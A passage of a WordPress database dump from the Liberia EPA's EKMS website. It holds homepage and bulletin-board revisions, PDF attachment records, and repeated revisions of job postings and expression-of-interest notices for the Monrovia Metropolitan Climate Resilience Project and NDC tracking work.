Document</h2>		\n		<p>Explore the EKMS Documents Database.</p>		\n			<a href=\"https://ekmsliberia.info/document-library/\" role=\"button\">\n						Explore All Documents\n					</a>\n			<h1>Latest News & Blogs</h1>		\n	<a href=\"https://ekmsliberia.info/epa-trains-environmental-inspectors-on-how-to-monitor-impacts-of-high-voltage-transmission-system/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2021/10/Pic-for-inspector-story-370x265.jpeg\" alt=\"EPA Trains Environmental Inspectors On How To Monitor Impacts of High Voltage Transmission System\" loading=\"lazy\" width=\"370\" height=\"265\"></a><a href=\"https://ekmsliberia.info/category/news/\">News</a><h4><a href=\"https://ekmsliberia.info/epa-trains-environmental-inspectors-on-how-to-monitor-impacts-of-high-voltage-transmission-system/\">EPA Trains Environmental Inspectors On How To Monitor Impacts of...</a></h4>Environmental inspectors and representatives of line government ministries, agencies and&hellip;\n	<a href=\"https://ekmsliberia.info/govt-launches-state-of-environment-report/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2021/09/State-of-Environment1-370x265.jpg\" alt=\"Gov’t Launches State of Environment Report\" loading=\"lazy\" width=\"370\" height=\"265\"></a><a href=\"https://ekmsliberia.info/category/news/\">News</a><h4><a href=\"https://ekmsliberia.info/govt-launches-state-of-environment-report/\">Gov’t Launches State of Environment Report</a></h4>The Government of Liberia through the Environmental Protection Agency of&hellip;\n	<a href=\"https://ekmsliberia.info/the-cross-cutting-capacity-development-project-implemented-by-the-epa-in-collaboration-with-undp-and-funded-by-gef-conducts-a-3-day-ekms-training/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2021/09/ekms--370x265.png\" alt=\"The Cross-Cutting Capacity Development Project Implemented by the EPA in collaboration with UNDP and Funded by GEF Conducts a 3-Day EKMS Training\" loading=\"lazy\" width=\"370\" height=\"265\"></a><a href=\"https://ekmsliberia.info/category/news/\">News</a><h4><a href=\"https://ekmsliberia.info/the-cross-cutting-capacity-development-project-implemented-by-the-epa-in-collaboration-with-undp-and-funded-by-gef-conducts-a-3-day-ekms-training/\">The Cross-Cutting Capacity Development Project Implemented by the EPA in...</a></h4>The Cross Cutting Capacity Development (CCCD) Project implemented by the&hellip;\n	<a href=\"https://ekmsliberia.info/epa-donates-two-thunder-2019-th-125-gy-motorbikes-to-the-general-service-agency-gsa/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2021/09/motorbikes-370x265.png\" alt=\"EPA Donates two Thunder 2019 TH-125 GY motorbikes to the General Service Agency (GSA)\" loading=\"lazy\" width=\"370\" height=\"265\"></a><a href=\"https://ekmsliberia.info/category/news/\">News</a><h4><a href=\"https://ekmsliberia.info/epa-donates-two-thunder-2019-th-125-gy-motorbikes-to-the-general-service-agency-gsa/\">EPA Donates two Thunder 2019 TH-125 GY motorbikes to the...</a></h4>The bikes were purchased and donated to the EPA by&hellip;\n			<a href=\"https://ekmsliberia.info/news-and-blogs/\" role=\"button\">\n						Read All News & Blogs\n					</a>','Home','','inherit','closed','closed','','9-revision-v1','','','2021-10-22 12:06:37','2021-10-22 12:06:37','',9,'https://ekmsliberia.info/?p=4470',0,'revision','',0),(4473,38,'2021-11-07 11:00:20','2021-11-07 11:00:20','<h1>You are on the EKMS Bulletin Board:</h1>		\n		<p>This bulletin provides a space for funding announcements, jobs, and other related openings.</p>		\n			<h4>Announcements/Vacancies</h4>		\n			<h4>Posted</h4>		\n			<h4>Closed</h4>','EKMS Bulletins','','inherit','closed','closed','','72-autosave-v1','','','2021-11-07 12:12:24','2021-11-07 12:12:24','',72,'https://ekmsliberia.info/?p=4473',0,'revision','',0),(4478,42,'2021-11-30 09:56:09','2021-11-30 09:56:09','','Safeguard Officer ToR MMCRP','','inherit','open','closed','','safeguard-officer-tor-mmcrp','','','2021-11-30 09:56:09','2021-11-30 09:56:09','',0,'https://ekmsliberia.info/wp-content/uploads/2021/11/Safeguard-Officer-ToR-MMCRP.pdf',0,'attachment','application/pdf',0),(4479,42,'2021-11-30 09:56:13','2021-11-30 09:56:13','','Procurement Expert ToR MMCRP','','inherit','open','closed','','procurement-expert-tor-mmcrp','','','2021-11-30 09:56:13','2021-11-30 09:56:13','',0,'https://ekmsliberia.info/wp-content/uploads/2021/11/Procurement-Expert-ToR-MMCRP.pdf',0,'attachment','application/pdf',0),(4480,42,'2021-11-30 09:56:16','2021-11-30 09:56:16','','Procurement Assistant ToR MMCRP','','inherit','open','closed','','procurement-assistant-tor-mmcrp','','','2021-11-30 09:56:16','2021-11-30 09:56:16','',0,'https://ekmsliberia.info/wp-content/uploads/2021/11/Procurement-Assistant-ToR-MMCRP.pdf',0,'attachment','application/pdf',0),(4481,42,'2021-11-30 09:56:20','2021-11-30 09:56:20','','Gender Specialist TOR','','inherit','open','closed','','gender-specialist-tor','','','2021-11-30 09:56:20','2021-11-30 09:56:20','',0,'https://ekmsliberia.info/wp-content/uploads/2021/11/Gender-Specialist-TOR.pdf',0,'attachment','application/pdf',0),(4482,42,'2021-11-30 09:56:23','2021-11-30 09:56:23','','Gender Officer ToR MMCRP','','inherit','open','closed','','gender-officer-tor-mmcrp','','','2021-11-30 09:56:23','2021-11-30 09:56:23','',0,'https://ekmsliberia.info/wp-content/uploads/2021/11/Gender-Officer-ToR-MMCRP.pdf',0,'attachment','application/pdf',0),(4483,42,'2021-11-30 09:56:27','2021-11-30 09:56:27','','Admin and Finance Assistant ToR MMCRP','','inherit','open','closed','','admin-and-finance-assistant-tor-mmcrp','','','2021-11-30 09:56:27','2021-11-30 09:56:27','',0,'https://ekmsliberia.info/wp-content/uploads/2021/11/Admin-and-Finance-Assistant-ToR-MMCRP.pdf',0,'attachment','application/pdf',0),(4485,42,'2021-12-01 12:28:37','2021-12-01 12:28:37','The EPA shall recruit the Administrative and Finance Assistant through an open, transparent and competitive process and shall be guided by inter alia the Procurement and Public Concessions Act of Liberia. All PMU staff shall conform to the Government of Liberia’s laws on anti-bribery and anticorruption. Notice is hereby issued to all interested candidates that failure to adhere to conflict-ofinterest restrictions and anti-fraud and corruption rules constitutes grounds for potential debarment\r\nfrom future participation in procurement of goods, services or works that may result from the Project.\r\n\r\nLink: <em><a href=\"https://ekmsliberia.info/wp-content/uploads/2021/11/Admin-and-Finance-Assistant-ToR-MMCRP.pdf\" target=\"_blank\" rel=\"noopener\">Administrative and Finance Assistant Wanted</a></em>\r\n\r\n&nbsp;','Administrative and Financial Assistant Wanted for the Monrovia Metropolitan Climate Resilience Project at EPA','','publish','closed','closed','','administrative-and-financial-assistant-wanted-for-the-monrovia-metropolitan-climate-resilience-project-at-epa','','','2021-12-06 20:41:35','2021-12-06 20:41:35','',0,'https://ekmsliberia.info/?post_type=ekms_bulletin&#038;p=4485',103,'ekms_bulletin','',0),(4486,42,'2021-12-02 12:35:18','2021-12-02 12:35:18','The EPA shall recruit the Administrative and Finance Assistant through an open, transparent and\r\ncompetitive process and shall be guided by inter alia the Procurement and Public Concessions Act of\r\nLiberia. All PMU staff shall conform to the Government of Liberia’s laws on anti-bribery and anticorruption. Notice is hereby issued to all interested candidates that failure to adhere to conflict-ofinterest restrictions and anti-fraud and corruption rules constitutes grounds for potential debarment\r\nfrom future participation in procurement of goods, services or works that may result from the Project.','Administrative and Financial Assistant Wanted for the Monrovia Metropolitan Climate Resilience Project at EPA','','inherit','closed','closed','','4485-revision-v1','','','2021-12-02 12:35:18','2021-12-02 12:35:18','',4485,'https://ekmsliberia.info/?p=4486',0,'revision','',0),(4487,42,'2021-12-02 12:36:25','2021-12-02 12:36:25','The EPA shall recruit the Administrative and Finance Assistant through an open, transparent and\ncompetitive process and shall be guided by inter alia the Procurement and Public Concessions Act of\nLiberia. All PMU staff shall conform to the Government of Liberia’s laws on anti-bribery and anticorruption. Notice is hereby issued to all interested candidates that failure to adhere to conflict-ofinterest restrictions and anti-fraud and corruption rules constitutes grounds for potential debarment\nfrom future participation in procurement of goods, services or works that may result from the Project.\n\nLink: <em><a href=\"https://ekmsliberia.info/wp-content/uploads/2021/11/Admin-and-Finance-Assistant-ToR-MMCRP.pdf\">Administrative and Finance Assistant Wanted</a></em>\n\n&nbsp;','Administrative and Financial Assistant Wanted for the Monrovia Metropolitan Climate Resilience Project at EPA','','inherit','closed','closed','','4485-autosave-v1','','','2021-12-02 12:36:25','2021-12-02 12:36:25','',4485,'https://ekmsliberia.info/?p=4487',0,'revision','',0),(4488,42,'2021-12-02 12:36:28','2021-12-02 12:36:28','The EPA shall recruit the Administrative and Finance Assistant through an open, transparent and\r\ncompetitive process and shall be guided by inter alia the Procurement and Public Concessions Act of\r\nLiberia. All PMU staff shall conform to the Government of Liberia’s laws on anti-bribery and anticorruption. Notice is hereby issued to all interested candidates that failure to adhere to conflict-ofinterest restrictions and anti-fraud and corruption rules constitutes grounds for potential debarment\r\nfrom future participation in procurement of goods, services or works that may result from the Project.\r\n\r\nLink: <em><a href=\"https://ekmsliberia.info/wp-content/uploads/2021/11/Admin-and-Finance-Assistant-ToR-MMCRP.pdf\">Administrative and Finance Assistant Wanted</a></em>\r\n\r\n&nbsp;','Administrative and Financial Assistant Wanted for the Monrovia Metropolitan Climate Resilience Project at EPA','','inherit','closed','closed','','4485-revision-v1','','','2021-12-02 12:36:28','2021-12-02 12:36:28','',4485,'https://ekmsliberia.info/?p=4488',0,'revision','',0),(4489,42,'2021-12-01 12:36:37','2021-12-01 12:36:37','The EPA shall recruit the Gender Officer through an open, transparent and competitive process and shall be guided by inter alia the Procurement and Public Concessions Act of Liberia. All PMU staff shall conform to the Government of Liberia’s laws on anti-bribery and anti-corruption. Notice is hereby issued to all interested candidates that failure to adhere to conflict-of-interest restrictions and anti-fraud and corruption rules constitutes grounds for potential debarment from future participation in the procurement of goods, services or works that may result from the Project.\r\n\r\nLink: <a href=\"https://ekmsliberia.info/wp-content/uploads/2021/11/Gender-Officer-ToR-MMCRP.pdf\" target=\"_blank\" rel=\"noopener\"><em>Gender Officer Wanted</em></a>','Gender Officer Wanted for the Monrovia Metropolitan Climate Resilience Project at EPA','','publish','closed','closed','','gender-officer-wanted-for-the-monrovia-metropolitan-climate-resilience-project-at-epa','','','2021-12-06 20:42:30','2021-12-06 20:42:30','',0,'https://ekmsliberia.info/?post_type=ekms_bulletin&#038;p=4489',102,'ekms_bulletin','',0),(4490,42,'2021-12-02 12:38:35','2021-12-02 12:38:35','The EPA shall recruit the Gender Officer through an open, transparent and competitive process and\r\nshall be guided by inter alia the Procurement and Public Concessions Act of Liberia. All PMU staff\r\nshall conform to the Government of Liberia’s laws on anti-bribery and anti-corruption. Notice is hereby\r\nissued to all interested candidates that failure to adhere to conflict-of-interest restrictions and anti-fraud\r\nand corruption rules constitutes grounds for potential debarment from future participation in the\r\nprocurement of goods, services or works that may result from the Project.\r\n\r\nLink: <a href=\"https://ekmsliberia.info/wp-content/uploads/2021/11/Gender-Officer-ToR-MMCRP.pdf\">Gender Officer Wanted</a>','Gender Officer Wanted for the Monrovia Metropolitan Climate Resilience Project at EPA','','inherit','closed','closed','','4489-revision-v1','','','2021-12-02 12:38:35','2021-12-02 12:38:35','',4489,'https://ekmsliberia.info/?p=4490',0,'revision','',0),(4491,42,'2021-12-02 12:38:46','2021-12-02 12:38:46','The EPA shall recruit the Gender Officer through an open, transparent and competitive process and\r\nshall be guided by inter alia the Procurement and Public Concessions Act of Liberia. All PMU staff\r\nshall conform to the Government of Liberia’s laws on anti-bribery and anti-corruption. Notice is hereby\r\nissued to all interested candidates that failure to adhere to conflict-of-interest restrictions and anti-fraud\r\nand corruption rules constitutes grounds for potential debarment from future participation in the\r\nprocurement of goods, services or works that may result from the Project.\r\n\r\nLink: <a href=\"https://ekmsliberia.info/wp-content/uploads/2021/11/Gender-Officer-ToR-MMCRP.pdf\"><em>Gender Officer Wanted</em></a>','Gender Officer Wanted for the Monrovia Metropolitan Climate Resilience Project at EPA','','inherit','closed','closed','','4489-revision-v1','','','2021-12-02 12:38:46','2021-12-02 12:38:46','',4489,'https://ekmsliberia.info/?p=4491',0,'revision','',0),(4492,42,'2021-12-01 12:39:38','2021-12-01 12:39:38','The EPA shall recruit the Gender Specialist through an open, transparent, and competitive process and shall be guided by inter alia the Procurement and Public Concessions Act of Liberia. All PMU staff shall conform to the Government of Liberia’s laws on anti-bribery and anti-corruption. Notice is hereby issued to all interested candidates that failure to adhere to conflict-of-interest restrictions and anti-fraud and corruption rules constitutes grounds for potential debarment from future participation in the procurement of goods, services or works that may result from the Project.\r\n\r\nLink: <a href=\"https://ekmsliberia.info/wp-content/uploads/2021/11/Gender-Specialist-TOR.pdf\" target=\"_blank\" rel=\"noopener\"><em>Gender Specialist Wanted</em></a>','Gender Specialist Wanted for the Monrovia Metropolitan Climate Resilience Project at EPA','','publish','closed','closed','','gender-specialist-wanted-for-the-monrovia-metropolitan-climate-resilience-project-at-epa','','','2021-12-06 20:44:57','2021-12-06 20:44:57','',0,'https://ekmsliberia.info/?post_type=ekms_bulletin&#038;p=4492',101,'ekms_bulletin','',0),(4493,42,'2021-12-02 12:41:35','2021-12-02 12:41:35','The EPA shall recruit the Gender Specialist through an open, transparent, and competitive process and\r\nshall be guided by inter alia the Procurement and Public Concessions Act of Liberia. All PMU staff\r\nshall conform to the Government of Liberia’s laws on anti-bribery and anti-corruption. Notice is hereby\r\nissued to all interested candidates that failure to adhere to conflict-of-interest restrictions and anti-fraud\r\nand corruption rules constitutes grounds for potential debarment from future participation in the\r\nprocurement of goods, services or works that may result from the Project.\r\n\r\nLink: <em>Gender Specialist Wanted</em>','Gender Specialist Wanted for the Monrovia Metropolitan Climate Resilience Project at EPA','','inherit','closed','closed','','4492-revision-v1','','','2021-12-02 12:41:35','2021-12-02 12:41:35','',4492,'https://ekmsliberia.info/?p=4493',0,'revision','',0),(4494,42,'2021-12-01 12:41:48','2021-12-01 12:41:48','The EPA shall recruit the Procurement Assistant through an open, transparent and competitive process and shall be guided by inter alia the Procurement and Public Concessions Act of Liberia. All PMU staff shall conform to the Government of Liberia’s laws on anti-bribery and anti-corruption. Notice is hereby issued to all interested candidates that failure to adhere to conflict-of-interest restrictions and anti-fraud and corruption rules constitutes grounds for potential debarment from future participation in the procurement of goods, services or works that may result from the Project.\r\n\r\nLink: <a href=\"https://ekmsliberia.info/wp-content/uploads/2021/11/Procurement-Assistant-ToR-MMCRP.pdf\" target=\"_blank\" rel=\"noopener\"><em>Procurement Assistant Wanted</em></a>','Procurement Assistant Wanted for the Monrovia Metropolitan Climate Resilience Project at EPA','','publish','closed','closed','','procurement-assistant-wanted-for-the-monrovia-metropolitan-climate-resilience-project-at-epa','','','2021-12-06 20:46:22','2021-12-06 20:46:22','',0,'https://ekmsliberia.info/?post_type=ekms_bulletin&#038;p=4494',100,'ekms_bulletin','',0),(4495,42,'2021-12-02 12:43:37','2021-12-02 12:43:37','The EPA shall recruit the Procurement Assistant through an open, transparent and competitive process\r\nand shall be guided by inter alia the Procurement and Public Concessions Act of Liberia. All PMU\r\nstaff shall conform to the Government of Liberia’s laws on anti-bribery and anti-corruption. Notice is\r\nhereby issued to all interested candidates that failure to adhere to conflict-of-interest restrictions and\r\nanti-fraud and corruption rules constitutes grounds for potential debarment from future participation in\r\nthe procurement of goods, services or works that may result from the Project.\r\n\r\nLink: <em>Procurement Assistant Wanted</em>','Procurement Assistant Wanted for the Monrovia Metropolitan Climate Resilience Project at EPA','','inherit','closed','closed','','4494-revision-v1','','','2021-12-02 12:43:37','2021-12-02 12:43:37','',4494,'https://ekmsliberia.info/?p=4495',0,'revision','',0),(4496,42,'2021-12-01 13:15:32','2021-12-01 13:15:32','The EPA shall recruit the Procurement Expert through an open, transparent and competitive process and shall be guided by inter alia the Procurement and Public Concessions Act of Liberia. All PMU staff shall conform to the Government of Liberia’s laws on anti-bribery and anti-corruption. Notice is hereby issued to all interested candidates that failure to adhere to conflict-of-interest restrictions and anti-fraud and corruption rules constitutes grounds for potential debarment from future participation in the procurement of goods, services or works that may result from the Project.\r\n\r\nLink: <em><a href=\"https://ekmsliberia.info/wp-content/uploads/2021/11/Procurement-Assistant-ToR-MMCRP.pdf\" target=\"_blank\" rel=\"noopener\">Procurement Expert Needed</a></em>','Procurement Expert Wanted for Monrovia Metropolitan Climate Resilience Project at EPA','','publish','closed','closed','','procurement-expert-wanted-for-monrovia-metropolitan-climate-resilience-project-at-epa','','','2021-12-06 20:47:10','2021-12-06 20:47:10','',0,'https://ekmsliberia.info/?post_type=ekms_bulletin&#038;p=4496',99,'ekms_bulletin','',0),(4497,42,'2021-12-02 13:18:57','2021-12-02 13:18:57','The EPA shall recruit the Procurement Expert through an open, transparent and competitive process\r\nand shall be guided by inter alia the Procurement and Public Concessions Act of Liberia. All PMU\r\nstaff shall conform to the Government of Liberia’s laws on anti-bribery and anti-corruption. Notice is\r\nhereby issued to all interested candidates that failure to adhere to conflict-of-interest restrictions and\r\nanti-fraud and corruption rules constitutes grounds for potential debarment from future participation in\r\nprocurement of goods, services or works that may result from the Project.\r\n\r\nLink: <em><a href=\"https://ekmsliberia.info/wp-content/uploads/2021/11/Procurement-Assistant-ToR-MMCRP.pdf\">Procurement Expert Needed</a></em>','Procurement Expert Wanted for Monrovia Metropolitan Climate Resilience Project at EPA','','inherit','closed','closed','','4496-revision-v1','','','2021-12-02 13:18:57','2021-12-02 13:18:57','',4496,'https://ekmsliberia.info/?p=4497',0,'revision','',0),(4498,42,'2021-12-01 20:38:16','2021-12-01 20:38:16','The EPA shall recruit the Safeguards Officer through an open, transparent and competitive process and shall be guided by inter alia the Procurement and Public Concessions Act of Liberia. All PMU staff shall conform to the Government of Liberia’s laws on anti-bribery and anti-corruption. Notice is hereby  issued to all interested candidates that failure to adhere to conflict-of-interest restrictions and anti-fraud and corruption rules constitutes grounds for potential debarment from future participation in the procurement of goods, services or works that may result from the Project.\r\n\r\nLink: <em><a href=\"https://ekmsliberia.info/wp-content/uploads/2021/11/Safeguard-Officer-ToR-MMCRP.pdf\" target=\"_blank\" rel=\"noopener\">Safeguard Officer Wanted</a></em>','Safeguard Officer Wanted for the Monrovia Metropolitan Climate Resilience Project at EPA','','publish','closed','closed','','safeguard-officer-wanted-for-the-monrovia-metropolitan-climate-resilience-project-at-epa','','','2021-12-06 20:40:52','2021-12-06 20:40:52','',0,'https://ekmsliberia.info/?post_type=ekms_bulletin&#038;p=4498',98,'ekms_bulletin','',0),(4499,42,'2021-12-06 20:40:52','2021-12-06 20:40:52','The EPA shall recruit the Safeguards Officer through an open, transparent and competitive process and shall be guided by inter alia the Procurement and Public Concessions Act of Liberia. All PMU staff shall conform to the Government of Liberia’s laws on anti-bribery and anti-corruption. Notice is hereby  issued to all interested candidates that failure to adhere to conflict-of-interest restrictions and anti-fraud and corruption rules constitutes grounds for potential debarment from future participation in the procurement of goods, services or works that may result from the Project.\r\n\r\nLink: <em><a href=\"https://ekmsliberia.info/wp-content/uploads/2021/11/Safeguard-Officer-ToR-MMCRP.pdf\" target=\"_blank\" rel=\"noopener\">Safeguard Officer Wanted</a></em>','Safeguard Officer Wanted for the Monrovia Metropolitan Climate Resilience Project at EPA','','inherit','closed','closed','','4498-revision-v1','','','2021-12-06 20:40:52','2021-12-06 20:40:52','',4498,'https://ekmsliberia.info/?p=4499',0,'revision','',0),(4500,42,'2021-12-06 20:40:59','2021-12-06 20:40:59','The EPA shall recruit the Safeguards Officer through an open, transparent and competitive process and shall be guided by inter alia the Procurement and Public Concessions Act of Liberia. All PMU staff shall conform to the Government of Liberia’s laws on anti-bribery and anti-corruption. Notice is hereby  issued to all interested candidates that failure to adhere to conflict-of-interest restrictions and anti-fraud and corruption rules constitutes grounds for potential debarment from future participation in the procurement of goods, services or works that may result from the Project.\n\nLink: <em><a href=\"https://ekmsliberia.info/wp-content/uploads/2021/11/Safeguard-Officer-ToR-MMCRP.pdf\" target=\"_blank\" rel=\"noopener\">Safeguard Officer Wanted</a></em>','Safeguard Officer Wanted for the Monrovia Metropolitan Climate Resilience Project at EPA','','inherit','closed','closed','','4498-autosave-v1','','','2021-12-06 20:40:59','2021-12-06 20:40:59','',4498,'https://ekmsliberia.info/?p=4500',0,'revision','',0),(4501,42,'2021-12-06 20:41:35','2021-12-06 20:41:35','The EPA shall recruit the Administrative and Finance Assistant through an open, transparent and competitive process and shall be guided by inter alia the Procurement and Public Concessions Act of Liberia. All PMU staff shall conform to the Government of Liberia’s laws on anti-bribery and anticorruption. Notice is hereby issued to all interested candidates that failure to adhere to conflict-ofinterest restrictions and anti-fraud and corruption rules constitutes grounds for potential debarment\r\nfrom future participation in procurement of goods, services or works that may result from the Project.\r\n\r\nLink: <em><a href=\"https://ekmsliberia.info/wp-content/uploads/2021/11/Admin-and-Finance-Assistant-ToR-MMCRP.pdf\" target=\"_blank\" rel=\"noopener\">Administrative and Finance Assistant Wanted</a></em>\r\n\r\n&nbsp;','Administrative and Financial Assistant Wanted for the Monrovia Metropolitan Climate Resilience Project at EPA','','inherit','closed','closed','','4485-revision-v1','','','2021-12-06 20:41:35','2021-12-06 20:41:35','',4485,'https://ekmsliberia.info/?p=4501',0,'revision','',0),(4502,42,'2021-12-06 20:42:17','2021-12-06 20:42:17','The EPA shall recruit the Gender Officer through an open, transparent and competitive process and shall be guided by inter alia the Procurement and Public Concessions Act of Liberia. All PMU staff shall conform to the Government of Liberia’s laws on anti-bribery and anti-corruption. Notice is hereby issued to all interested candidates that failure to adhere to conflict-of-interest restrictions and anti-fraud and corruption rules constitutes grounds for potential debarment from future participation in theprocurement of goods, services or works that may result from the Project.\r\n\r\nLink: <a href=\"https://ekmsliberia.info/wp-content/uploads/2021/11/Gender-Officer-ToR-MMCRP.pdf\" target=\"_blank\" rel=\"noopener\"><em>Gender Officer Wanted</em></a>','Gender Officer Wanted for the Monrovia Metropolitan Climate Resilience Project at EPA','','inherit','closed','closed','','4489-revision-v1','','','2021-12-06 20:42:17','2021-12-06 20:42:17','',4489,'https://ekmsliberia.info/?p=4502',0,'revision','',0),(4503,42,'2021-12-06 20:42:30','2021-12-06 20:42:30','The EPA shall recruit the Gender Officer through an open, transparent and competitive process and shall be guided by inter alia the Procurement and Public Concessions Act of Liberia. All PMU staff shall conform to the Government of Liberia’s laws on anti-bribery and anti-corruption. Notice is hereby issued to all interested candidates that failure to adhere to conflict-of-interest restrictions and anti-fraud and corruption rules constitutes grounds for potential debarment from future participation in the procurement of goods, services or works that may result from the Project.\r\n\r\nLink: <a href=\"https://ekmsliberia.info/wp-content/uploads/2021/11/Gender-Officer-ToR-MMCRP.pdf\" target=\"_blank\" rel=\"noopener\"><em>Gender Officer Wanted</em></a>','Gender Officer Wanted for the Monrovia Metropolitan Climate Resilience Project at EPA','','inherit','closed','closed','','4489-revision-v1','','','2021-12-06 20:42:30','2021-12-06 20:42:30','',4489,'https://ekmsliberia.info/?p=4503',0,'revision','',0),(4504,42,'2021-12-06 20:44:57','2021-12-06 20:44:57','The EPA shall recruit the Gender Specialist through an open, transparent, and competitive process and shall be guided by inter alia the Procurement and Public Concessions Act of Liberia. All PMU staff shall conform to the Government of Liberia’s laws on anti-bribery and anti-corruption. Notice is hereby issued to all interested candidates that failure to adhere to conflict-of-interest restrictions and anti-fraud and corruption rules constitutes grounds for potential debarment from future participation in the procurement of goods, services or works that may result from the Project.\r\n\r\nLink: <a href=\"https://ekmsliberia.info/wp-content/uploads/2021/11/Gender-Specialist-TOR.pdf\" target=\"_blank\" rel=\"noopener\"><em>Gender Specialist Wanted</em></a>','Gender Specialist Wanted for the Monrovia Metropolitan Climate Resilience Project at EPA','','inherit','closed','closed','','4492-revision-v1','','','2021-12-06 20:44:57','2021-12-06 20:44:57','',4492,'https://ekmsliberia.info/?p=4504',0,'revision','',0),(4505,42,'2021-12-06 20:46:22','2021-12-06 20:46:22','The EPA shall recruit the Procurement Assistant through an open, transparent and competitive process and shall be guided by inter alia the Procurement and Public Concessions Act of Liberia. All PMU staff shall conform to the Government of Liberia’s laws on anti-bribery and anti-corruption. Notice is hereby issued to all interested candidates that failure to adhere to conflict-of-interest restrictions and anti-fraud and corruption rules constitutes grounds for potential debarment from future participation in the procurement of goods, services or works that may result from the Project.\r\n\r\nLink: <a href=\"https://ekmsliberia.info/wp-content/uploads/2021/11/Procurement-Assistant-ToR-MMCRP.pdf\" target=\"_blank\" rel=\"noopener\"><em>Procurement Assistant Wanted</em></a>','Procurement Assistant Wanted for the Monrovia Metropolitan Climate Resilience Project at EPA','','inherit','closed','closed','','4494-revision-v1','','','2021-12-06 20:46:22','2021-12-06 20:46:22','',4494,'https://ekmsliberia.info/?p=4505',0,'revision','',0),(4506,42,'2021-12-06 20:47:10','2021-12-06 20:47:10','The EPA shall recruit the Procurement Expert through an open, transparent and competitive process and shall be guided by inter alia the Procurement and Public Concessions Act of Liberia. All PMU staff shall conform to the Government of Liberia’s laws on anti-bribery and anti-corruption. Notice is hereby issued to all interested candidates that failure to adhere to conflict-of-interest restrictions and anti-fraud and corruption rules constitutes grounds for potential debarment from future participation in the procurement of goods, services or works that may result from the Project.\r\n\r\nLink: <em><a href=\"https://ekmsliberia.info/wp-content/uploads/2021/11/Procurement-Assistant-ToR-MMCRP.pdf\" target=\"_blank\" rel=\"noopener\">Procurement Expert Needed</a></em>','Procurement Expert Wanted for Monrovia Metropolitan Climate Resilience Project at EPA','','inherit','closed','closed','','4496-revision-v1','','','2021-12-06 20:47:10','2021-12-06 20:47:10','',4496,'https://ekmsliberia.info/?p=4506',0,'revision','',0),(4507,42,'2021-12-06 20:47:38','2021-12-06 20:47:38','','ToR NDC Tracking_FINAL VERSION','','inherit','open','closed','','tor-ndc-tracking_final-version','','','2021-12-06 20:47:38','2021-12-06 20:47:38','',0,'https://ekmsliberia.info/wp-content/uploads/2021/12/ToR-NDC-Tracking_FINAL-VERSION.pdf',0,'attachment','application/pdf',0),(4508,42,'2021-12-01 20:47:46','2021-12-01 20:47:46','The objective of this consultancy is to strengthen the capacities of the EPA in tracking progress of the implementation of Liberia’s Nationally Determined Contribution (NDC) under the Paris Agreement in the energy, transport and waste sectors. This consultancy will closely interlink with this process by advising the development of NDC Tracking tools and indicators for monitoring progress towards achieving the revised targets and actions set out in Liberia’s updated NDCs in the energy, transport and waste sectors.\r\n\r\nLink: <em><a href=\"https://ekmsliberia.info/wp-content/uploads/2021/12/ToR-NDC-Tracking_FINAL-VERSION.pdf\" target=\"_blank\" rel=\"noopener\">Expression of Interest</a></em>','REQUEST FOR EXPRESSION OF INTEREST - Strengthen Systems and Frameworks for Tracking Progress on Liberia’s NDC','','publish','closed','closed','','request-for-expression-of-interest-strengthen-systems-and-frameworks-for-tracking-progress-on-liberias-ndc','','','2021-12-06 20:51:39','2021-12-06 20:51:39','',0,'https://ekmsliberia.info/?post_type=ekms_bulletin&#038;p=4508',97,'ekms_bulletin','',0),(4509,42,'2021-12-06 20:51:39','2021-12-06 20:51:39','The objective of this consultancy is to strengthen the capacities of the EPA in tracking progress of the implementation of Liberia’s Nationally Determined Contribution (NDC) under the Paris Agreement in the energy, transport and waste sectors. This consultancy will closely interlink with this process by advising the development of NDC Tracking tools and indicators for monitoring progress towards achieving the revised targets and actions set out in Liberia’s updated NDCs in the energy, transport and waste sectors.\r\n\r\nLink: <em><a href=\"https://ekmsliberia.info/wp-content/uploads/2021/12/ToR-NDC-Tracking_FINAL-VERSION.pdf\" target=\"_blank\" rel=\"noopener\">Expression of Interest</a></em>','REQUEST FOR EXPRESSION OF INTEREST - Strengthen Systems and Frameworks for Tracking Progress on Liberia’s NDC','','inherit','closed','closed','','4508-revision-v1','','','2021-12-06 20:51:39','2021-12-06 20:51:39','',4508,'https://ekmsliberia.info/?p=4509',0,'revision','',0),(4510,42,'2021-12-01 20:52:01','2021-12-01 20:52:01','The objective of this consultancy is to support the EPA and the Government of Liberia in assessing the degree of alignment of existing sectoral policies with the updated NDC targets and how these policies can be strengthened in the context of delivering sustainable development co-benefits. A better understanding of co-benefits will support future policy making as well as communicate about the sustainable development benefits that well-designed climate policies can entail. The EPA has recently\r\nfinalized the updating of its NDC with the support of Liberia’s development partners- the NDC Partnership through Conservation International, the European Union through the EU Climate Change Alliance+, UNDP Liberia through its Climate Promise, and the International Renewable Energy Agency (IRENA). This consultancy will closely interlink with this process and will build on the results of that work.\r\n\r\nLink: <em><a href=\"https://ekmsliberia.info/wp-content/uploads/2021/12/ToR-Policy-Assessment_FINAL_VERSION.pdf\" target=\"_blank\" rel=\"noopener\">Expression of Interest</a></em>','REQUEST FOR EXPRESSION OF INTEREST - Assessing Sustainable Development Impacts of Climate Policies','','publish','closed','closed','','request-for-expression-of-interest-assessing-sustainable-development-impacts-of-climate-policies','','','2021-12-06 20:58:00','2021-12-06 20:58:00','',0,'https://ekmsliberia.info/?post_type=ekms_bulletin&#038;p=4510',96,'ekms_bulletin','',0),(4511,42,'2021-12-06 20:54:05','2021-12-06 20:54:05','','ToR Policy Assessment_FINAL_VERSION','','inherit','open','closed','','tor-policy-assessment_final_version','','','2021-12-06 20:54:05','2021-12-06 20:54:05','',0,'https://ekmsliberia.info/wp-content/uploads/2021/12/ToR-Policy-Assessment_FINAL_VERSION.pdf',0,'attachment','application/pdf',0),(4512,42,'2021-12-06 20:58:00','2021-12-06 20:58:00','The objective of this consultancy is to support the EPA and the Government of Liberia in assessing the degree of alignment of existing sectoral policies with the updated NDC targets and how these policies can be strengthened in the context of delivering sustainable development co-benefits. A better understanding of co-benefits will support future policy making as well as communicate about the sustainable development benefits that well-designed climate policies can entail. The EPA has recently\r\nfinalized the updating of its NDC with the support of Liberia’s development partners- the NDC Partnership through Conservation International, the European Union through the EU Climate Change Alliance+, UNDP Liberia through its Climate Promise, and the International Renewable Energy Agency (IRENA). This consultancy will closely interlink with this process and will build on the results of that work.\r\n\r\nLink: <em><a 